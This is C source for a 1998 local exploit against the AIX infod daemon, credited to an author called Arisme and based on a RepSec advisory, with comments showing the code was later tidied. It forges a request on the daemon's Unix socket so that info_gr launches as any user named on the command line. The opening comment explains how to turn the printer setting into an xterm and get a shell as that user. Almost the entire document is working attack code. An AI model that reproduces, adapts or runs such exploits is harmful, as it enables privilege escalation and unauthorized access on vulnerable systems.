
/* Infod AIX exploit (k) Arisme 21/11/98  - All Rights Reversed
   Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)

   Run the program with, as its only argument, the login whose uid/gid you
   want the daemon to start info_gr with :)  DISPLAY must be set to an X
   server the daemon-started process can reach (xhost it if needed; the
   final message reminds you of this).  When the window appears, select
   "options", "defaults", change printer to something more useful (like
   /bin/x11/xterm) and print !

   Comments, questions : arisme@altern.org */
  9.  
  10.  
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
  18.  
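/* Size of every scratch/send buffer in this file; the whole request sent
 * to the daemon must fit in one of these. */
#define TAILLE_BUFFER 2000
/* Unix-domain socket on which the infod daemon listens. */
#define SOCK_PATH "/tmp/.info-help"
/* Working directory advertised to info_gr in the PWD fields. */
#define PWD "/tmp"

/* User-visible messages.  The two long literals were line-wrapped in the
 * distributed listing (which does not compile); they are single strings. */
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "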
  29.  
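/* Append one string frame to PARAM: a one-byte length, the bytes of VAR,
 * then three zero bytes -- the "size_X X 0 0 0" layout every string field
 * of the request uses.
 *
 * The bytes go straight to the stream, so there is no fixed-size scratch
 * buffer to overflow (the original sprintf'd into a 2000-byte stack array
 * with no bound on strlen(var)).  Because the length field is a single
 * byte, a value longer than 255 bytes cannot be represented: it is cut to
 * 255 bytes so the frame stays self-consistent (the original emitted the
 * low byte of the length followed by the whole string, desynchronising
 * everything after it), and a warning is printed.  A failed write is
 * reported with perror(); the return type is kept void for the callers. */
void send_environ(char *var, FILE *param)
{
    static const unsigned char trailer[3] = { 0, 0, 0 };
    size_t taille = strlen(var);
    unsigned char len_byte;

    if (taille > 255) {
        fprintf(stderr, "send_environ: value longer than 255 bytes truncated\n");
        taille = 255;
    }
    len_byte = (unsigned char)taille;

    if (fwrite(&len_byte, 1, 1, param) != 1
        || fwrite(var, 1, taille, param) != taille
        || fwrite(trailer, 1, sizeof trailer, param) != sizeof trailer) {
        perror("send_environ: fwrite");
    }
}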
  38.  
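/* Return the value of environment variable NAME, or "" when it is unset,
 * so the result can always be handed to "%s"/strcpy.  The original passed
 * raw getenv() results to sprintf("%s") and strcpy(), which is undefined
 * (and crashes on AIX) when e.g. LANG or HOSTNAME is not set. */
static const char *env_or_empty(const char *name)
{
    const char *val = getenv(name);
    return val ? val : "";
}

/* Write "NAME=VALUE" as one string frame to PARAM via send_environ().
 * A pair that would not fit the scratch buffer is skipped with a warning
 * instead of overflowing it (PATH/NLSPATH come from the environment and
 * can be arbitrarily long). */
static void send_env_pair(const char *name, const char *value, FILE *param)
{
    char line[TAILLE_BUFFER];

    if (strlen(name) + 1 + strlen(value) >= sizeof line) {
        fprintf(stderr, "environment entry %s is too long, skipped\n", name);
        return;
    }
    sprintf(line, "%s=%s", name, value);
    send_environ(line, param);
}

/* Write COUNT raw bytes from BUF to PARAM.  A short write is fatal: a
 * truncated request must not be sent to the daemon. */
static void put_bytes(const void *buf, size_t count, FILE *param)
{
    if (fwrite(buf, 1, count, param) != count) {
        perror("fwrite");
        exit(1);
    }
}

/* Build the info_gr start request for the user named in argv[1] and send
 * it to the infod daemon over its Unix socket (SOCK_PATH).
 *
 * Request layout, as reproduced from the original (see the comment on
 * each field below): 6 bytes carrying the uid as a 16-bit big-endian
 * value, 2 bytes for the gid, a 259-byte NUL-padded DISPLAY, a 9-byte
 * LANG field, five string frames (HOME, LOGNAME, USERNAME, PWD, tty), a
 * 4-byte count of environment frames followed by those frames, and the
 * "-q" argument frame.
 *
 * The request is staged in an anonymous temporary file (tmpfile()) so
 * that send_environ()'s FILE* interface can be reused; unlike the fixed
 * /tmp/tempo.fun of the original there is no predictable path another
 * local user could pre-create or symlink.  Exits with status 1 on any
 * usage or I/O failure; returns 0 once the request has been written. */
int main(int argc, char **argv)
{
    static const unsigned char lang_field[9] = { 1, 'C', 0, 0, 0, 0, 0, 0, 0 };
    static const unsigned char q_arg[4] = { 1, '-', 'q', 0 };
    struct sockaddr_un sin;
    struct passwd *info;
    int chaussette;
    long taille_param;
    char buffer[TAILLE_BUFFER], paramz[TAILLE_BUFFER], mail[TAILLE_BUFFER];
    FILE *param;
    char *HOME, *LOGIN;
    const char *disp;
    int UID, GID;
    size_t i, nb_env, done;

    printf("\n\n%s\n\n", KOPY);

    if (argc != 2) {
        printf("%s\n", NOUSER);
        exit(1);
    }

    info = getpwnam(argv[1]);
    if (!info) {
        printf("%s\n", UNKNOWN);
        exit(1);
    }
    HOME = info->pw_dir;
    LOGIN = info->pw_name;
    UID = info->pw_uid;
    GID = info->pw_gid;

    /* The request carries uid/gid as 16-bit values; a larger id would be
     * silently truncated to a different user, so refuse it up front. */
    if (UID < 0 || UID > 0xffff || GID < 0 || GID > 0xffff) {
        fprintf(stderr, "uid %d / gid %d do not fit the 16-bit request fields\n", UID, GID);
        exit(1);
    }

    /* The window needs a display the daemon-started process can open, so
     * an unset DISPLAY makes the request pointless (and the original
     * crashed on strcpy(NULL) here).  The field is fixed at 259 bytes. */
    disp = getenv("DISPLAY");
    if (!disp || strlen(disp) >= 259) {
        fprintf(stderr, "DISPLAY must be set and shorter than 259 bytes\n");
        exit(1);
    }

    param = tmpfile();
    if (!param) {
        perror("tmpfile");
        exit(1);
    }

    chaussette = socket(AF_UNIX, SOCK_STREAM, 0);
    if (chaussette < 0) {
        perror("socket");
        exit(1);
    }
    memset(&sin, 0, sizeof sin);
    sin.sun_family = AF_UNIX;
    strcpy(sin.sun_path, SOCK_PATH);    /* constant path, fits sun_path */
    if (connect(chaussette, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("connect");
        exit(1);
    }

    /* 0 0 PF_UID pf_UID 0 0 */
    buffer[0] = 0;
    buffer[1] = 0;
    buffer[2] = (char)(UID >> 8);
    buffer[3] = (char)(UID & 0xff);
    buffer[4] = 0;
    buffer[5] = 0;
    put_bytes(buffer, 6, param);

    /* PF_GID pf_GID */
    buffer[0] = (char)(GID >> 8);
    buffer[1] = (char)(GID & 0xff);
    put_bytes(buffer, 2, param);

    /* DISPLAY (259 bytes, NUL padded) */
    memset(buffer, 0, sizeof buffer);
    strcpy(buffer, disp);
    put_bytes(buffer, 259, param);

    /* LANG (1 C 0 0 0 0 0 0 0) */
    put_bytes(lang_field, sizeof lang_field, param);

    /* size_$HOME $HOME 0 0 0, then $LOGNAME, $USERNAME and $PWD frames */
    send_environ(HOME, param);
    send_environ(LOGIN, param);
    send_environ(LOGIN, param);
    send_environ(PWD, param);

    /* tty frame.  The original author sent ptsname(0) while debugging,
     * but info_gr crashes opening our pts once it has already changed
     * UID, so a harmless /dev/null is sent instead. */
    send_environ("/dev/null", param);

    /* Environment handed to info_gr.  A NULL value means "copy from our
     * own environment" (empty if unset).  The original author noted this
     * is probably more than the daemon needs but was useful for
     * debugging; the set and order are kept as they were. */
    if (strlen(LOGIN) + sizeof "/usr/spool/mail/" > sizeof mail) {
        fprintf(stderr, "login name too long\n");
        exit(1);
    }
    sprintf(mail, "/usr/spool/mail/%s", LOGIN);
    {
        const char *env_tab[][2] = {
            { "_",         "./startinfo" },
            { "TMPDIR",    "/tmp" },
            { "LANG",      NULL },
            { "LOGIN",     LOGIN },
            { "NLSPATH",   NULL },
            { "PATH",      NULL },
            { "EDITOR",    "emacs" },
            { "LOGNAME",   LOGIN },
            { "MAIL",      mail },
            { "HOSTNAME",  NULL },
            { "LOCPATH",   NULL },
            { "PS1",       "(exploited !) " },
            { "USER",      LOGIN },
            { "AUTHSTATE", NULL },
            { "DISPLAY",   disp },
            { "SHELL",     NULL },
            { "ODMDIR",    "/etc/objrepos" },
            { "HOME",      HOME },
            { "TERM",      "vt220" },
            { "MAILMSG",   "[YOU HAVE NEW MAIL]" },
            { "PWD",       PWD },
            { "TZ",        "NFT-1" },
            { "A__z",      "! LOGNAME" },
        };
        nb_env = sizeof env_tab / sizeof env_tab[0];

        /* Number of environment frames that follow (23 in the original),
         * emitted as one byte followed by three zero bytes, exactly as
         * before.  Deriving it from the table keeps count and frames in
         * step. */
        buffer[0] = (char)nb_env;
        buffer[1] = 0;
        buffer[2] = 0;
        buffer[3] = 0;
        put_bytes(buffer, 4, param);

        for (i = 0; i < nb_env; i++) {
            const char *val = env_tab[i][1] ? env_tab[i][1]
                                            : env_or_empty(env_tab[i][0]);
            send_env_pair(env_tab[i][0], val, param);
        }
    }

    /* Start info_gr with the -q parameter, or the process would be run
     * locally and not from the daemon. */
    put_bytes(q_arg, sizeof q_arg, param);

    /* Read the staged request back.  The original fread() into paramz
     * without checking the size against the buffer; a long PATH alone
     * could push the request past TAILLE_BUFFER. */
    if (fseek(param, 0, SEEK_END) != 0 || (taille_param = ftell(param)) < 0) {
        perror("ftell");
        exit(1);
    }
    if ((size_t)taille_param > sizeof paramz) {
        fprintf(stderr, "request of %ld bytes exceeds the %d-byte send buffer\n",
                taille_param, TAILLE_BUFFER);
        exit(1);
    }
    rewind(param);
    if (fread(paramz, 1, (size_t)taille_param, param) != (size_t)taille_param) {
        perror("fread");
        exit(1);
    }
    fclose(param);

    /* Thank you Mr daemon :)  write() may be short on a stream socket,
     * so keep going until the whole request is out. */
    for (done = 0; done < (size_t)taille_param; ) {
        ssize_t n = write(chaussette, paramz + done, (size_t)taille_param - done);
        if (n < 0) {
            perror("write");
            exit(1);
        }
        done += (size_t)n;
    }

    printf("\n%s %s\n", OK, env_or_empty("HOSTNAME"));

    close(chaussette);
    return 0;
}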